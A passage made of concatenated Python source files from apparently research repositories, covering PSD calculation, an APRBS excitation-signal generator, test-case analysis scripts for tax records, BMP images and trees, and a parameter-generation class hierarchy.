    PSD[(1+nfrq_pos_idx),] = PSD[(1+nfrq_pos_idx),] + PSD[(-1-nfrq_pos_idx),]
# Crucial normalizations
# ----------------------
#
# 1. Make PSD independent of frequency parameters: 'fs' & 'nfft'
# 2. Account for windowing
PSD = PSD[0:nfrq,]/(nfft*fs*wndw_weight)
# Return frequency axis and calculated PSD
return f,PSD
```
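The assumptions block above describes a Welch-style averaged periodogram. Below is a minimal usage sketch for `cal_psd`, assuming only NumPy and that the file above is importable as `Data_Handler`; the test signal, sampling rate and window choice are invented, and note that the overlap is passed under the key `ovlp_pcnt`, which is the key the function actually reads.
```python
import numpy as np
from Data_Handler import cal_psd   # assumes the file above is on the path
# Hypothetical input: 10 s of a 50 Hz tone plus noise, one channel along axis 1.
fs = 1000.0
t = np.arange(0.0, 10.0, 1.0 / fs)
x = (np.sin(2.0 * np.pi * 50.0 * t) + 0.1 * np.random.randn(t.size)).reshape(-1, 1)
# 'window' is any callable mapping nfft to a 1D array, e.g. np.hanning.
f, PSD = cal_psd(x, nfft=1024, fs=fs, window=np.hanning, ovlp_pcnt=50)
print("Peak at %.1f Hz" % f[np.argmax(PSD[:, 0])])   # expected near 50 Hz
```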
#### File: JohnDoe2576/MRAC/Parameters.py
```python
class Parameters:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def info(self):
print("The parameters, and data-type are: ")
for key,values in self.__dict__.items():
print("{} = {}, {}\n".format(key, values, type(values)))
``` |
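A quick sketch of how this kwargs-driven holder is used elsewhere in the repository (for example by `Data_Handler`); the attribute names and values here are invented.
```python
from Parameters import Parameters   # assumes the file above is importable
dat_par = Parameters(filename="plant_data", fileno="01", fs=100.0)
dat_par.info()             # prints every stored attribute with its value and type
print(dat_par.filename)    # attributes are exactly the keyword arguments passed in
```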
{
"source": "JohnDoe2576/MyPythonCodes",
"score": 4
} |
#### File: JohnDoe2576/MyPythonCodes/Excite.py
```python
import numpy as np
import matplotlib.pyplot as plt
def aprbs(**parms):
# Generate an Amplitude modulated Pseudo-Random Binary Sequence (APRBS)
#
# The Pseudo-Random Binary Sequence (PRBS) is extensively used as an
# excitation signal for System Identification of linear systems. It is
# characterized by randomly delayed shifts in amplitude between a
# user-defined minimum and maximum. These delayed shifts are usually
# range-bound, and are very helpful in capturing the system behaviour
# close to the operating frequency of the system.
#
# A nonlinear system usually will have different behaviour at different
    # amplitudes and cannot be predicted with the principle of superposition.
    # Hence, the excitation signal also needs to be modified to accommodate
# for capturing system behaviour at different amplitudes. The APRBS is
# an extension of PRBS by introducing randomly delayed shifts to random
# levels of range-bound amplitudes (rather than between a maximum and
# minimum).
#
# Input parameters:
# n_samples: Number of required samples
# alpha: tuple of (min_amplitude, max_amplitude)
# tau: tuple of (min_delay, max_delay)
# Extract signal parameters
n_samples = parms['n_samples'] # Number of samples
tau = parms['tau'] # Delay vector
alpha = parms['alpha'] # Amplitude vector
# Convert to usable parameters
tau_min = tau[0]
tau_max = tau[1]
tau_range = tau_max - tau_min
alpha_min = alpha[0]
alpha_max = alpha[1]
alpha_range = alpha_max - alpha_min
# Initialize arrays
tau_array = np.zeros((n_samples),dtype=int)
alpha_array = np.zeros((n_samples))
signal = np.zeros((n_samples))
# Initialize counters
sample_count = 0
shift_count = 0
while sample_count < n_samples:
# Generate a random shift to perturb 'tau' and 'alpha'
tau_shift = np.random.uniform(0.0, 1.0, 1)
alpha_shift = np.random.uniform(0.0, 1.0, 1)
        # Introduce the random delay such that it is range-bound between 'tau_min' and 'tau_max'
tau_array[shift_count] = np.fix(tau_min + (tau_shift * tau_range) ).astype(int)
alpha_array[shift_count] = alpha_min + (alpha_shift * alpha_range)
# Update counters
sample_count += tau_array[shift_count]
shift_count += 1
tau_array[shift_count-1] -= (sample_count - n_samples)
idx = 0
for i in range(0,shift_count):
idx_tmp = idx + np.arange(0,tau_array[i],1,dtype=int)
signal[idx_tmp] = alpha_array[i]
idx = idx + tau_array[i]
return signal
# Time parameters
t0 = 0. # Start time
dt = 0.01 # Time step
t1 = 100. # End time
# Time vector
t = np.arange(t0, t1, dt)
# Signal parameters
n_samples = len(t)
alpha = (-2.5, 2.5)
tau = tuple(np.array([dt, 1.])/dt)
u = aprbs(n_samples=n_samples, alpha=alpha, tau=tau)
plt.plot(t,u)
plt.show()
``` |
{
"source": "john-doe-3141592653/XXX",
"score": 4
} |
#### File: PLEDGE/tax/analysis_tax.py
```python
import sys
class Physical_person():
def __init__(self, by, dr, dt, ad):
self.birth_year = by
self.disability_rate = dr
self.disability_type = dt
self.address = ad
def __repr__(self):
return "birth_year: " + str(self.birth_year) + "\n" +\
"disability_rate: " + str(self.disability_rate) + "\n" +\
"disability_type: " + str(self.disability_type) + "\n" +\
"address: " + str(self.address) + "\n"
class Tax_payer(Physical_person):
def __init__(self, by, dr, dt, ad, ir):
Physical_person.__init__(self, by, dr, dt, ad)
self.is_resident = ir
self.children = []
self.income_pension = []
self.income_employment = []
self.income_other = []
def __repr__(self):
return Physical_person.__repr__(self) +\
"is_resident: " + str(self.is_resident) + "\n" +\
"nb_child: " + str(len(self.children)) + "\n" +\
"income_pension: " + str(self.income_pension) + "\n" +\
"income_employment: " + str(self.income_employment) + "\n" +\
"income_other: " + str(self.income_other) + "\n"
class Child(Physical_person):
def __init__(self, by, dr, dt, ad):
Physical_person.__init__(self, by, dr, dt, ad)
def __repr__(self):
return Physical_person.__repr__(self)
def return_interval(param, name):
#print(name + ": " + str(param))
if 0 <= param < 0.33:
return "True;False;False"
elif 0.33 <= param <= 0.67:
return "False;True;False"
elif 0.67 < param <= 1:
return "False;False;True"
else:
print("ERROR: invalid " + name)
exit()
def return_interval_array(param, name):
#print(name + ": " + str(param))
L = False
M = False
H = False
for p in param:
if 0 <= p < 0.33:
L = True
elif 0.33 <= p <= 0.67:
M = True
elif 0.67 < p <= 1:
H = True
else:
print("ERROR: invalid " + name)
exit()
return str(L) + ";" + str(M) + ";" + str(H)
def analyse_nb_tax_payer():
return return_interval((nb_tax_payer-1)/100, "nb_tax_payer")
def analyse_birth_year():
tmp = []
for t in tax_payer_array:
tmp.append((t.birth_year-1920)/100)
return return_interval_array(tmp, "birth_year")
def analyse_disability_rate():
tmp = []
for t in tax_payer_array:
tmp.append(t.disability_rate)
return return_interval_array(tmp, "disability_rate")
def analyse_disability_type():
type_none = False
type_vision = False
type_a = False
for t in tax_payer_array:
if t.disability_type == "None":
type_none = True
elif t.disability_type == "Vision":
type_vision = True
else:
type_a = True
return str(type_none) + ";" + str(type_vision) + ";" + str(type_a)
def analyse_is_resident():
tr = False
fa = False
for t in tax_payer_array:
if t.is_resident == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_tax_payer_nb_address():
tmp = []
for t in tax_payer_array:
tmp.append((len(t.address)-1)/2)
return return_interval_array(tmp, "tax_payer_nb_address")
def analyse_tax_payer_address():
lu = False
fr = False
be = False
de = False
ot = False
for t in tax_payer_array:
for a in t.address:
if a == "LU":
lu = True
elif a == "FR":
fr = True
elif a == "BE":
be = True
elif a == "DE":
de = True
else:
ot = True
return str(lu) + ";" + str(fr) + ";" + str(be) + ";" + str(de) + ";" + str(ot)
def analyse_nb_child():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_child = len(t.children)
if nb_child == 0:
zer = True
elif nb_child == 1:
one = True
elif nb_child == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_child_birth_year():
tmp = []
for t in tax_payer_array:
for c in t.children:
tmp.append((c.birth_year-1920)/100)
return return_interval_array(tmp, "child_birth_year")
def analyse_child_disability_rate():
tmp = []
for t in tax_payer_array:
for c in t.children:
            tmp.append(c.disability_rate)
return return_interval_array(tmp, "child_disability_rate")
def analyse_child_disability_type():
type_none = False
type_vision = False
type_a = False
for t in tax_payer_array:
for c in t.children:
if c.disability_type == "None":
type_none = True
elif c.disability_type == "Vision":
type_vision = True
else:
type_a = True
return str(type_none) + ";" + str(type_vision) + ";" + str(type_a)
def analyse_child_nb_address():
tmp = []
for t in tax_payer_array:
for c in t.children:
            tmp.append((len(c.address)-0.5)/3)
return return_interval_array(tmp, "child_nb_address")
def analyse_child_address():
lu = False
fr = False
be = False
de = False
ot = False
for t in tax_payer_array:
for c in t.children:
            for a in c.address:
if a == "LU":
lu = True
elif a == "FR":
fr = True
elif a == "BE":
be = True
elif a == "DE":
de = True
else:
ot = True
return str(lu) + ";" + str(fr) + ";" + str(be) + ";" + str(de) + ";" + str(ot)
def analyse_nb_pension():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_pension = len(t.income_pension)
if nb_pension == 0:
zer = True
elif nb_pension == 1:
one = True
elif nb_pension == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_nb_employment():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_employment = len(t.income_employment)
if nb_employment == 0:
zer = True
elif nb_employment == 1:
one = True
elif nb_employment == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_nb_other():
zer = False
one = False
two = False
thr = False
for t in tax_payer_array:
nb_other = len(t.income_other)
if nb_other == 0:
zer = True
elif nb_other == 1:
one = True
elif nb_other == 2:
two = True
else:
thr = True
return str(zer) + ";" + str(one) + ";" + str(two) + ";" + str(thr)
def analyse_pension_is_local():
tr = False
fa = False
for t in tax_payer_array:
for i in t.income_pension:
if i == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_employment_is_local():
tr = False
fa = False
for t in tax_payer_array:
for i in t.income_employment:
if i == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_other_is_local():
tr = False
fa = False
for t in tax_payer_array:
for i in t.income_other:
if i == "True":
tr = True
else:
fa = True
return str(tr) + ";" + str(fa)
def analyse_nb_income():
tmp = []
for t in tax_payer_array:
tmp.append((len(t.income_pension) + len(t.income_employment) + len(t.income_other) - 1)/2)
return return_interval_array(tmp, "nb_income")
def analyse_lu_address():
no_lu = False
lu = False
all_lu = False
for t in tax_payer_array:
counter = 0
for a in t.address:
if a == "LU":
counter += 1
if counter == len(t.address):
all_lu = True
elif counter == 0:
no_lu = True
else:
lu = True
return str(no_lu) + ";" + str(lu) + ";" + str(all_lu)
def analyse_c4():
pension_lu = False
employment_lu = False
other_lu = False
for t in tax_payer_array:
tmp = False
for a in t.address:
if a == "LU":
tmp = True
if tmp:
for i in t.income_pension:
if i == "True":
pension_lu = True
for i in t.income_employment:
if i == "True":
employment_lu = True
for i in t.income_other:
if i == "True":
other_lu = True
return str(pension_lu) + ";" + str(employment_lu) + ";" + str(other_lu)
tax_payer_array = []
with open(sys.argv[1] + "tax.csv", "r") as f:
nb_tax_payer = int(f.readline()[:-1])
for i in range(nb_tax_payer):
tmp = f.readline()[:-1].split(";")
address = f.readline()[:-1].split(";")
t = Tax_payer(int(tmp[0]), float(tmp[1]), tmp[2], address, tmp[3])
nb_child = int(f.readline()[:-1])
for j in range(nb_child):
tmp = f.readline()[:-1].split(";")
address = f.readline()[:-1].split(";")
c = Child(int(tmp[0]), float(tmp[1]), tmp[2], address)
t.children.append(c)
nb_income_pension = int(f.readline()[:-1])
if nb_income_pension > 0:
t.income_pension = f.readline()[:-1].split(";")
nb_income_employment = int(f.readline()[:-1])
if nb_income_employment > 0:
t.income_employment = f.readline()[:-1].split(";")
nb_income_other = int(f.readline()[:-1])
if nb_income_other > 0:
t.income_other = f.readline()[:-1].split(";")
tax_payer_array.append(t)
with open(sys.argv[2] + "analysis.csv", "a") as f:
f.write(analyse_nb_tax_payer() + ";" + analyse_birth_year() + ";" + analyse_disability_rate() + ";" + analyse_disability_type() + ";" + analyse_is_resident() + ";" + analyse_tax_payer_nb_address() + ";" + analyse_tax_payer_address() + ";" + analyse_nb_child() + ";" + analyse_child_birth_year() + ";" + analyse_child_disability_rate() + ";" + analyse_child_disability_type() + ";" + analyse_child_nb_address() + ";" + analyse_child_address() + ";" + analyse_nb_pension() + ";" + analyse_nb_employment() + ";" + analyse_nb_other() + ";" + analyse_pension_is_local() + ";" + analyse_employment_is_local() + ";" + analyse_other_is_local() + ";" + analyse_nb_income() + ";" + analyse_lu_address() + ";" + analyse_c4() + "\n")
```
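The reader at the bottom of this script expects a rigid line layout in `tax.csv`: a payer count, then per payer one attribute line, one address line, a child count with one attribute line and one address line per child, and three income sections each made of a count line followed (when the count is positive) by a line of is_local flags. The sketch below writes a hypothetical single-payer file in that layout, with every value invented; the script itself is then run as `python analysis_tax.py <input_dir>/ <output_dir>/`, since it concatenates the directory arguments with the file names.
```python
# Hypothetical tax.csv accepted by the reader above (all values made up).
lines = [
    "1",                   # number of tax payers
    "1975;0.0;None;True",  # birth_year;disability_rate;disability_type;is_resident
    "LU;FR",               # tax payer addresses
    "1",                   # number of children
    "2005;0.0;None",       # child: birth_year;disability_rate;disability_type
    "LU",                  # child addresses
    "1",                   # number of pension incomes
    "True",                # is_local flag per pension income
    "2",                   # number of employment incomes
    "True;False",          # is_local flag per employment income
    "0",                   # number of other incomes (no flag line when zero)
]
with open("tax.csv", "w") as f:
    f.write("\n".join(lines) + "\n")
```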
#### File: tax/data_transformation_scripts/create_tax_csv.py
```python
import statistics as stat
import os
def array_to_string(array):
res = ""
for a in array:
res += str(a) + ";"
return res[:-1] + "\n"
for i in range(10):
for j in range(100):
none_id = ""
vision_id = ""
a_id = ""
fr_id = ""
lu_id = ""
de_id = ""
be_id = ""
other_id = ""
nb_tax_payer = -1
disability_type = []
is_resident = []
address = []
income = []
country = {}
is_local = {}
nb_none = -1
nb_vision = -1
nb_a = -1
line_counter = 0
previous_lines = []
save_line_address = 0
save_line_income = 0
tmp_address = []
tmp_income = []
with open("./" + str(i) + "/test_case_" + str(j) + "/tax.uml", "r") as f:
for line in f:
line_counter += 1
if "Tax_payer" in line:
nb_tax_payer += 1
if "None" in line and "ownedLiteral" in line:
none_id = line.split(" ")[5][8:][:-1]
elif "Vision" in line and "ownedLiteral" in line:
vision_id = line.split(" ")[5][8:][:-1]
elif "\"A\"" in line and "ownedLiteral" in line:
a_id = line.split(" ")[5][8:][:-1]
elif "\"FR\"" in line and "ownedLiteral" in line:
fr_id = line.split(" ")[5][8:][:-1]
elif "\"LU\"" in line and "ownedLiteral" in line:
lu_id = line.split(" ")[5][8:][:-1]
elif "\"DE\"" in line and "ownedLiteral" in line:
de_id = line.split(" ")[5][8:][:-1]
elif "\"BE\"" in line and "ownedLiteral" in line:
be_id = line.split(" ")[5][8:][:-1]
elif "\"Other\"" in line and "ownedLiteral" in line:
other_id = line.split(" ")[5][8:][:-1]
elif none_id != "" and none_id in line:
nb_none += 1
if nb_none >= 0:
disability_type.append("none")
elif vision_id != "" and vision_id in line:
nb_vision += 1
if nb_vision >= 0:
disability_type.append("vision")
elif a_id != "" and a_id in line:
nb_a += 1
if nb_a >= 0:
disability_type.append("a")
elif "is_resident" in line and not "ownedAttribute" in line:
if "value=" in line:
is_resident.append(True)
else:
is_resident.append(False)
elif "address" in line and "instance" in line:
tmp = line.split(" ")[10][10:][:-4]
if save_line_address == 0:
save_line_address = line_counter
if line_counter < save_line_address + 3:
tmp_address.append(tmp)
else:
address.append(tmp_address)
tmp_address = []
tmp_address.append(tmp)
save_line_address = line_counter
elif "country" in line:
if not " type" in line:
tmp = line.split(" ")[10][10:][:-4]
if tmp == fr_id:
tmp = "FR"
elif tmp == lu_id:
tmp = "LU"
elif tmp == de_id:
tmp = "DE"
elif tmp == be_id:
tmp = "BE"
                        else: # other
tmp = "OTHER"
country[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
elif "income" in line and "instance" in line and not "Tax_card" in previous_lines[1]:
tmp = line.split(" ")[10][10:][:-4]
if save_line_income == 0:
save_line_income = line_counter
if line_counter < save_line_income + 3:
tmp_income.append(tmp)
else:
income.append(tmp_income)
tmp_income = []
tmp_income.append(tmp)
save_line_income = line_counter
elif "is_local" in line and "Pension" in previous_lines[1]:
if "value=" in line:
tmp = ("P", line.split(" ")[-1][7:][:-4])
else:
tmp = ("P", "false")
is_local[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
elif "is_local" in line and "Employment" in previous_lines[1]:
if "value=" in line:
tmp = ("E", line.split(" ")[-1][7:][:-4])
else:
tmp = ("E", "false")
is_local[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
elif "is_local" in line and "Other" in previous_lines[1]:
if "value=" in line:
tmp = ("O", line.split(" ")[-1][7:][:-4])
else:
tmp = ("O", "false")
is_local[previous_lines[1].split(" ")[4][8:][:-1]] = tmp
if len(previous_lines) > 2:
previous_lines = previous_lines[1:]
previous_lines.append(line)
address.append(tmp_address)
income.append(tmp_income)
with open("./" + str(i) + "/test_case_" + str(j) + "/tax.csv", "w") as f:
f.write(str(nb_tax_payer) + "\n")
for k in range(nb_tax_payer):
tmp = ""
tmp += "1920;"
if disability_type[k] == "none":
tmp += "0.0;"
else:
tmp += "1.0;"
tmp += disability_type[k] + ";"
tmp += str(is_resident[k]) + "\n"
for add in address[k]:
tmp += country[add] + ";"
tmp = tmp[:-1] + "\n0\n"
p = []
e = []
o = []
for inc in income[k]:
if is_local[inc][0] == "P":
p.append(is_local[inc][1])
elif is_local[inc][0] == "E":
e.append(is_local[inc][1])
else:
o.append(is_local[inc][1])
tmp += str(len(p)) + "\n"
if len(p) > 0:
for isloc in p:
tmp += isloc + ";"
tmp = tmp[:-1] + "\n"
tmp += str(len(e)) + "\n"
if len(e) > 0:
for isloc in e:
tmp += isloc + ";"
tmp = tmp[:-1] + "\n"
tmp += str(len(o)) + "\n"
if len(o) > 0:
for isloc in o:
tmp += isloc + ";"
tmp = tmp[:-1] + "\n"
f.write(tmp)
```
#### File: XXX/bmp/analysis_bmp.py
```python
import sys
def extract_pixel(f):
r = int.from_bytes(f.read(1), "little")
g = int.from_bytes(f.read(1), "little")
b = int.from_bytes(f.read(1), "little")
if r != g or g != b:
gray_check = True
return r
def extract_padding(f, n):
padding = int.from_bytes(f.read(n), "little")
def return_interval(param, name):
#print(name + ": " + str(param))
if 0 <= param < 0.33:
return "True;False;False"
elif 0.33 <= param <= 0.67:
return "False;True;False"
elif 0.67 < param <= 1:
return "False;False;True"
else:
print("ERROR: invalid " + name)
exit()
def return_interval_array(param, name):
#print(name + ": " + str(param))
L = False
M = False
H = False
for p in param:
if 0 <= p < 0.33:
L = True
elif 0.33 <= p <= 0.67:
M = True
elif 0.67 < p <= 1:
H = True
else:
print("ERROR: invalid " + name)
exit()
return str(L) + ";" + str(M) + ";" + str(H)
def analyse_size():
return return_interval((img_w-10)/90, "size")
def analyse_gray():
tmp = []
for i in range(img_w):
for j in range(img_w):
tmp.append(pixel_array[i][j]/255)
return return_interval_array(tmp, "gray")
def analyse_padding():
tmp = (4-(3*img_w)%4)%4
if tmp == 0:
return "True;False;False;False"
elif tmp == 1:
return "False;True;False;False"
elif tmp == 2:
return "False;False;True;False"
else:
return "False;False;False;True"
def analyse_min_max():
min = 255
max = 0
for i in range(img_w):
for j in range(img_w):
tmp = pixel_array[i][j]
if tmp < min:
min = tmp
if tmp > max:
max = tmp
return return_interval(min/255, "min") + ";" + return_interval(max/255, "max")
def analyse_border():
tmp_H = []
tmp_V = []
for i in range(img_w):
tmp_H.append((pixel_array[i][-1] - pixel_array[i][0])/255)
tmp_V.append((pixel_array[-1][i] - pixel_array[0][i])/255)
return return_interval_array(tmp_H, "horizontal_border") + ";" + return_interval_array(tmp_V, "vertical_border")
def analyse_interval():
tmp_H = []
tmp_V = []
for i in range(img_w):
for j in range(i, img_w-1):
tmp_H.append((pixel_array[i][j+1] - pixel_array[i][j])/255)
tmp_V.append((pixel_array[j+1][i] - pixel_array[j][i])/255)
return return_interval_array(tmp_H, "horizontal_interval") + ";" + return_interval_array(tmp_V, "vertical_interval")
pixel_array = []
img_w = 0
with open(sys.argv[1] + "bmp.bmp", "rb") as f:
ID_field = f.read(2).decode("utf-8")
size = int.from_bytes(f.read(4), "little")
unused = int.from_bytes(f.read(4), "little")
offset = int.from_bytes(f.read(4), "little")
dib_header_size = int.from_bytes(f.read(4), "little")
img_w = int.from_bytes(f.read(4), "little")
img_h = int.from_bytes(f.read(4), "little")
nb_color_plane = int.from_bytes(f.read(2), "little")
bit_per_pixel = int.from_bytes(f.read(2), "little")
compression_method = int.from_bytes(f.read(4), "little")
data_size = int.from_bytes(f.read(4), "little")
print_resolution_w = int.from_bytes(f.read(4), "little")
print_resolution_h = int.from_bytes(f.read(4), "little")
nb_color = int.from_bytes(f.read(4), "little")
nb_important_color = int.from_bytes(f.read(4), "little")
for i in range(img_h):
tmp = []
for j in range(img_w):
tmp.append(extract_pixel(f))
pixel_array.append(tmp)
extract_padding(f, (4-(3*img_w)%4)%4)
with open(sys.argv[2] + "analysis.csv", "a") as f:
f.write(analyse_size() + ";"+ analyse_gray() + ";" + analyse_padding() + ";" + analyse_min_max() + ";" + analyse_border() + ";" + analyse_interval() + "\n")
```
#### File: bmp/debug/custom_bmp.py
```python
import numpy as np
def generate_size():
s = np.random.randint(5, 30)
print(s)
return s, s
def get_random_increment():
return np.random.randint(int(255/img_w))
def generate_pixels(w, h):
p = [0]*(w*h)
for i in range(h):
for j in range(w):
if i == 0 and j == 0:
p[i*w + j] = get_random_increment()
else:
if i == 0:
p[i*w + j] = min(p[i*w + j-1] + get_random_increment(), 255)
elif j ==0:
p[i*w + j] = min(p[(i-1)*w + j] + get_random_increment(), 255)
else:
p[i*w + j] = min(max(p[i*w + j-1], p[(i-1)*w + j]) + get_random_increment(), 255)
for i in range(h):
for j in range(w):
p[i*w + j] = tuple((p[i*w + j], p[i*w + j], p[i*w + j]))
return p
def add_pixel(f, p):
for i in p:
f.write(i.to_bytes(1, 'little'))
def add_padding(f, w):
p= (4-(3*w)%4)%4
for i in range(p):
f.write((0).to_bytes(1, 'little'))
def add_pixels(w, h, p):
with open("./bmp.bmp", "ab") as f:
for i in range(h):
for j in range(w):
                add_pixel(f, p[i*w + j])
add_padding(f, w)
img_w, img_h = generate_size()
pixels = generate_pixels(img_w, img_h)
ID_field = "BM"
padding = img_h*((4-(img_w*3)%4)%4)
offset = 54
size = offset + img_w*img_h*3 + padding
dib_header_size = 40
nb_color_planes = 1
bit_per_pixel = 24
compression_method = 0
data_size = 16
print_resolution_w = 2835
print_resolution_h = 2835
nb_color = 0
nb_important_color = 0
#red_pixel = (0, 0, 255)
#white_pixel = (255, 255, 255)
#blue_pixel = (255, 0, 0)
#green_pixel = (0, 255, 0)
#black_pixel = (0, 0, 0)
with open("./bmp.bmp", "wb") as f:
f.write(bytes(ID_field, 'utf-8'))
f.write(size.to_bytes(4, 'little'))
#f.write((size-5-(4-(5*3)%2)).to_bytes(4, 'little'))
f.write((0).to_bytes(4, 'little'))
f.write((54).to_bytes(4, 'little'))
f.write(dib_header_size.to_bytes(4, 'little'))
f.write(img_w.to_bytes(4, 'little'))
f.write(img_h.to_bytes(4, 'little'))
f.write(nb_color_planes.to_bytes(2, 'little'))
f.write(bit_per_pixel.to_bytes(2, 'little'))
f.write(compression_method.to_bytes(4, 'little'))
f.write(data_size.to_bytes(4, 'little'))
f.write(print_resolution_w.to_bytes(4, 'little'))
f.write(print_resolution_h.to_bytes(4, 'little'))
f.write(nb_color.to_bytes(4, 'little'))
f.write(nb_important_color.to_bytes(4, 'little'))
add_pixels(img_w, img_h, pixels)
```
#### File: XXX/tree/oracle_tree.py
```python
import sys
MIN_N = 1
MAX_N = 50
nb_node_check = False
root_check = False
father_check = False
height_check = False
coherence_check = False
def compile_checkers_result():
res = nb_node_check
res = res or root_check
res = res or father_check
res = res or height_check
res = res or coherence_check
return res
def print_checkers_result():
print("nb_node_check: ", nb_node_check)
print("root_check: ", root_check)
print("father_check: ", father_check)
print("height_check: ", height_check)
print("coherence_check: ", coherence_check)
class Node():
def __init__(self, n, f, h):
self.nb = n
self.father = f
self.depth = h
self.children = []
def __repr__(self):
return "\n\n--- Node ---" +\
"\nnb: " + str(self.nb) +\
"\nfather: " + str(self.father) +\
"\ndepth: " + str(self.depth) +\
"\nchildren: " + str(self.children)
def read_csv():
with open(sys.argv[1] + "tree.csv", "r") as f:
for line in f:
tmp = line.split(";")
tmp[-1] = tmp[-1][:-1]
n = Node(int(tmp[0]), int(tmp[1]), int(tmp[2]))
for c in tmp[3:]:
n.children.append(int(c))
node.append(n)
def check_nb_node():
    global nb_node_check
    if not MIN_N <= len(node) <= MAX_N:
        nb_node_check = True
def check_root():
    global root_check
    if node[0].father != -1 or node[0].depth != 0:
        root_check = True
def check_father():
    global father_check
    for n in node[1:]:
        if n.father >= len(node):
            father_check = True
def check_height():
    global height_check
    height = 0
    for n in node:
        if n.depth > height:
            height = n.depth
    if height >= len(node):
        height_check = True
def check_coherence(i=0):
    # Walk the tree from node i, flag depth mismatches and return the number
    # of nodes reached so the root call can detect unreachable nodes.
    global coherence_check
    counter = 1
    for c in node[i].children:
        if node[c].depth != node[i].depth + 1:
            coherence_check = True
        counter += check_coherence(c)
    if i == 0 and counter != len(node):
        coherence_check = True
    return counter
node = []
read_csv()
check_nb_node()
check_root()
check_father()
check_height()
check_coherence()
#print_checkers_result()
with open(sys.argv[2] + "oracle", "a") as f:
f.write(str(compile_checkers_result()) + "\n")
```
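For reference, the oracle reads `tree.csv` as one node per line in the form `node;father;depth` followed by the indices of that node's children. A hypothetical four-node tree in that layout (values invented):
```python
# Root 0 with children 1 and 2; node 3 hangs under node 1.
lines = [
    "0;-1;0;1;2",  # node 0: no father (-1), depth 0, children 1 and 2
    "1;0;1;3",     # node 1: father 0, depth 1, child 3
    "2;0;1",       # node 2: leaf at depth 1
    "3;1;2",       # node 3: leaf at depth 2
]
with open("tree.csv", "w") as f:
    f.write("\n".join(lines) + "\n")
```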
#### File: XXX/src/Parameter.py
```python
import numpy as np
import Miscellaneous as misc
from Xxx import SETTINGS
from Element import Element
###############################################################################
# --- Parameter ------------------------------------------------------------- #
###############################################################################
class Parameter(Element):
"""
    A Parameter object holds an array of variables and everything required to generate them
"""
counter = 0
def __init__(self, n, d, nb):
"""
:param n : name
:param d : depth
:param nb : nb_instances
"""
Element.__init__(self, n, d)
self.__check_nb_instances(nb)
self._nb_instances = nb
self._identifier = "var_" + str(Parameter.counter)
self._values = [None]*self._nb_instances
self._locks = [False]*self._nb_instances
self._nb_instances_lock = False
Parameter.counter += 1
def __check_nb_instances(self, nb):
if not 0 <= nb <= SETTINGS.get("parameter_max_nb_instances"):
misc.error("Parameter::__check_nb_instances() -> " + self._name + ": nb_instances parameter is out of range [0 ; " + str(SETTINGS.get("parameter_max_nb_instances")) + "]")
raise ValueError
def change_nb_instances(self, nb):
if not self._nb_instances_lock:
self.__check_nb_instances(nb)
while self._nb_instances > nb:
self._values.pop()
self._locks.pop()
self._nb_instances -= 1
while self._nb_instances < nb:
self._values.append(None)
self._locks.append(False)
self._nb_instances += 1
def lock_nb_instances(self):
self._nb_instances_lock = True
def lock_i(self, i):
self._locks[i] = True
def lock_all(self):
for i in range(self._nb_instances):
self.lock_i(i)
def unlock_nb_instances(self):
self._nb_instances_lock = False
def unlock_i(self, i):
self._locks[i] = False
def unlock_all(self):
for i in range(self._nb_instances):
self.unlock_i(i)
def reset_i(self, i):
if not self._locks[i]:
self._values[i] = None
def reset_all(self):
for i in range(self._nb_instances):
self.reset_i(i)
def _random_gen(self):
"""
Generate a parameter content according to the selected method
:return: the parameter content
"""
raise NotImplementedError
def set_value_i(self, i, val):
"""
Set the parameter i content according to val.
val can be "r" for random or a specific value.
The function will do nothing if the parameter is locked (locks[i] == True)
:param i : the parameter index
:param val : "r" or a specific value
:return : None
"""
raise NotImplementedError
def set_all_values(self, val):
for i in range(self._nb_instances):
self.set_value_i(i, val)
def duplicate(self):
"""
Create a new instance of the parameter with the same initial settings
:return: A parameter object
"""
raise NotImplementedError
def __repr__(self):
return "name: " + self._name +\
"\nidentifier: " +str(self._identifier) +\
"\ndepth: " + str(self._depth) +\
"\nnb_instances: " + str(self._nb_instances) +\
"\nvalues: " + str(self._values) +\
"\nlocks: " + str(self._locks)
def get_type(self):
raise NotImplementedError
def get_values(self):
return self._values
values = property(get_values)
def get_identifier(self):
return self._identifier
identifier = property(get_identifier)
def get_nb_instances_lock(self):
return self._nb_instances_lock
nb_instances_lock = property(get_nb_instances_lock)
def get_locks(self):
return self._locks
locks = property(get_locks)
def get_nb_instances(self):
return self._nb_instances
nb_instances = property(get_nb_instances)
###############################################################################
# --- Categorical-Parameter ------------------------------------------------- #
###############################################################################
class Categorical_Parameter(Parameter):
def __init__(self, n, d, v, w, nb):
"""
:param n : name
:param d : depth
:param v : values
:param w : weights
:param nb : nb_instances
"""
Parameter.__init__(self, n, d, nb)
self._check_values(v)
self._values_array = v
self.__check_weights(w)
self._weights_array = w
def _check_values(self, v):
raise NotImplementedError
def __check_weights(self, w):
if w:
if len(self._values_array) != len(w):
misc.error("Categorical_Parameter::__check_weights() -> " + self._name + ": values array size and weights array size must be equal")
raise ValueError
def _random_gen(self):
if self._weights_array:
return self._discrete_distribution_selection()
else:
return self._values_array[np.random.randint(0, len(self._values_array))]
def _discrete_distribution_selection(self):
r = round(np.random.randint(sum(self._weights_array)))
counter = 0
for i in range(len(self._weights_array)):
if counter <= r < (counter + self._weights_array[i]):
return self._values_array[i]
counter += self._weights_array[i]
def get_values_array(self):
return self._values_array
values_array = property(get_values_array)
def get_weights_array(self):
return self._weights_array
weights_array = property(get_weights_array)
def __repr__(self):
return Parameter.__repr__(self) +\
"\nvalues: " + str(self._values_array) +\
"\nweights: " + str(self._weights_array)
###############################################################################
# --- Boolean_Parameter ----------------------------------------------------- #
###############################################################################
